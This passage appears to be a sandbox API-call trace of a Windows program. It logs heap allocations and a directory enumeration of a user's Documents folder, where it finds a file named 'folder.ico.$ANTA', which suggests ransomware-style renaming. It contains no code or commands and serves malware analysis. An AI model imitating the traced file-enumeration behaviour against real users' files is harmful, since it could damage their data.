Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.691] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.692] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private")) returned 0x12 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.692] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0084.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.693] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.693] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.694] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xfe9c7774, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe9c7774, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca7f0, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0084.694] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xfe9c7774, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe9c7774, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca7f0, cFileName="..", cAlternateFileName="")) returned 1 [0084.694] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe77a09f, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfe77a09f, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe9c7774, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x74f0, dwReserved0=0x0, dwReserved1=0x43ca7f0, cFileName="folder.ico.$ANTA", cAlternateFileName="FOLDER~1.$AN")) returned 1 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0084.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.695] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.696] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0084.696] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.696] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0084.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.696] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.697] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.697] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.697] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2580, ftCreationTime.dwHighDateTime=0x144eb40, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2580, ftLastWriteTime.dwLowDateTime=0x43e9c68, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﯸмńဓ+\x10")) returned 0 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.698] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.698] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.698] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.699] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0084.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 